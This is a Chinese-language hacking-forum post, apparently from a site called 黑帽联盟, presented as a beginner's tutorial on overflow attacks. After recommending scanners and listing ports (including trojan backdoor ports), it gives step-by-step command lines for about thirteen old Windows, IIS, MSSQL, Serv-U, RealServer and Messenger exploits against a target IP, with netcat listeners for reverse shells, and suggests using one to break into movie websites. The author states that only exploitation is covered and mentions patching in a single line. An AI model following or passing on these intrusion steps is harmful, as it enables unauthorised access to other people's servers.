黑帽联盟

 找回密码
 会员注册
查看: 2071|回复: 0
打印 上一主题 下一主题

[系统安全] 新手经验分享:注入和溢出教程

[复制链接]
yun 黑帽联盟官方人员 

920

主题

37

听众

1364

积分

超级版主

Rank: 8Rank: 8

  • TA的每日心情
    奋斗
    2019-10-18 11:20
  • 签到天数: 678 天

    [LV.9]以坛为家II

    出入侵   

    因为时间的原因我只介绍下这些漏洞的是如何利用的不介绍他们是怎么产生的至于怎么修补我会提一下的~~~

    在介绍漏洞之前我先介绍几个很不错的扫描软件,毕竟扫描是基础

    x-san
    这个扫描软件我想大家不在陌生!!他是一个全方位扫描漏洞的软件,他主要是用于扫描漏洞的,当然其他方面的比如固定端口的扫描,ip的扫描也都
    是可以的缺点就是速度太慢~~~

    nmap
    这个扫描软件功能比较强大!!是居于cmd界面操作的,只要按照他的提示使用即可,扫描的速度也比较的快,要想快速搞定一台服务器的朋友还是用
    这个扫描软件比较好

    x-way
    这个扫描软件他的功能与其他的扫描软件不同!!不只是扫描还包括了很多的小工具!!比如查询器,猜解机...如果你要猜测什么账号和密码方面的
    用这个就不错了

    现在我在把常见的端口所对应的服务给大家列出来!!我觉得了解一下还是很重要的~~
    80         全球信息网超文本传输协议(www)
    110        pop3 服务器(邮箱发送服务器)
    135 (tcp/ip)       查询服务 dns
    139        共享资源端口(netbios-ssn)
    143        imap电子邮件
    443        安全服务
    444        snpp
    445        nt的共享资源新端口(139)
    990        ftps
    995        pop3s
    1026       win2000 的 internet 信息服务
    1243       sub-7木马
    1524       ingreslock后门
    3128       squid http代理服务器的默认端口
    3389       win2000 远程登陆端口
    4899       remote administrator [远程控制]
    7626       冰河(木马) 默认端口
    12345      netbus木马 默认端口
    12346      netbus木马 默认端口
    还有象流光呀什么的我想大家 都比较熟悉了~~这里就不说了!!好了下面开始介绍漏洞和漏洞的利用方法!!其操作都是在cmd下面操作~~

    1.webdav漏洞 首先要开放80端口   要安装了 iis
    用到的工具 webdavx3
    利用方法   webdavx3 目标主机ip

    2.rpc漏洞 工具 winrpcdcom
    利用方法 winrpcdcom 目标主机ip(操作系统类型)   目标主机ip

    3.idq 首先要安装了iis

    利用 正向连接
    1.溢出
    2.telnet 登陆
    telnet 目标主机ip 端口

    反响连接
    nc -l -p 本机端口
    3.dcomrpc 溢出
    漏洞利用 dcomrpc -d 目标主机ip [ortions] 有提示
    [ortions] -l 6668 绑定6668端口在6668端口溢出

    4.rpc long 文件名溢出
    此漏洞可以通过 135(tcp/ip) 139 445 593 端口发起攻击
    用 msdcomscanner.exe 软件扫描
    漏洞利用 rpc2sbaa.exe   os(操作系统类型0 1) 目标主机ip

    5.rpc locator 溢出漏洞
    扫描软件 rpc-locator.exe ip段
    看说明通过注册表改掉ip
    在清空连接 建立空连接
    最好溢出 xlocator 操作系统类型

    6.iis.asp 影射分块编码远程溢出漏洞 aspcode 溢出
    扫描的时候扫描iis漏洞就可以了
    漏洞利用
    aspcode.exe 目标主机ip [asp文件](iisstart.asp)开放的web端口是默认的80就不用填   win2000系统不用填写是winxp的话就要填写winxp

    7.sql hello exploit 漏洞溢出攻击
    首先扫描1433端口 分析对方是否开放了1433端口
    用dotpot port ready 1.6 来扫描是否开放1433端口
    溢出工具 sqlhello
    漏洞利用
    sqlhello 反向连接工具 sqlhello 目标主机ip 目标主机端口1433 本机ip 本机端口

    正向连接
    工具 sqlhello2
    sqlhello2 目标主机ip 目标主机端口1433

    8. mssql sql2 溢出 首先扫描1433端口是否开放
    溢出工具 nc 和 sql2.exe
    漏洞利用 sql2.exe 目标主机ip 本机ip 监听的本机端口 sql的版本一般为0

    9.ser-u溢出
    首先扫描 ftp弱口令
    溢出工具 serv-u 3.x/4.x
    serv -i 目标主机ip -t 0(操作系统类型)-u ftp登陆账号 -p ftp登陆密码 -f 21对方开放的端口默认为21 -s 溢出后反响连接的端口也就上自己的端口

    10 电影网站入侵real server 溢出
    开放了real networks real sever 服务的服务器开放后其开放的断口的默认值为 主要检测554端口
    rtsp 端口   554
    pna 端口 7070
    http 端口80
    mms 端口 1755
    监控端口 9090
    管理端口 自己设置
    其他的端口号也可以改变
    漏洞利用所要用到的工具 realex
    溢出步骤
    1.   realex host(目标主机ip) 操作系统类型
    2.   telnet host 31337   绑定31337断口   在第2个cmd窗口进行连接   要先溢出在连接
    主要用于入侵电影网站

    11    dameware mina remote control 远程缓冲区溢出 漏洞益处   
    首先扫描6129 端口是否开放如果开放才有可能存在这个漏洞
    方法反响连接
    工具利用 dameweird.exe 目标主机ip 本机ip 本地监听端口 溢出版本

    12.windows meida 远程益处漏洞 媒体服务产生的一个漏洞
    首先扫描1755 7007 6666 7778 端口是否开放
    溢出工具 nc
    media.exe
    漏洞利用 media 目标主机ip -p 目标主机端口(80) -r 路径(/scripts/nsiislog.dll
    nc -vv 目标主机ip 34816(确定的) -vv邦定34816端口的意思不是反响连接

    13.windows messenger 服务的远程溢出(消息服务产生的漏洞)
    扫描工具 messengerscan

    方法 scanmsgr target=192.168.0.1-192.168.0.255(一个网段)
    漏洞利用第一步
    msghack -h 目标主机ip -v 目标主机操作系统 -i 目标主机语言版本 -s 操作系统的补丁号(0 1)-r 本机ip -p 监听的本机端口

    第二步
    nc -vv -l -p 本机端口    -vv邦定某个端口 -l -p反响连接或监听某个端口

    综上所述溢出入侵的方法其实很简单 要么正向连接要么反向连接
    正向连接就是用工具将他直接溢出
    反响连接那么就要用到 nc这个小工具 因为反向连接是让目标主机来连接你,而不是你去连接目标主机,反向连接很容易逃过防火墙的检测..
    当然还有其他方面的漏洞ms04 ms05 ,代理,输入法的漏洞....只要找到相应的工具将他溢出就可以了
    以上的漏洞当然在实际电脑中很难找到了,我讲的只是漏洞利用的方法!!至于上面的漏洞怎么修复,大部分只要不断的升级打补丁就可以了~~

    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部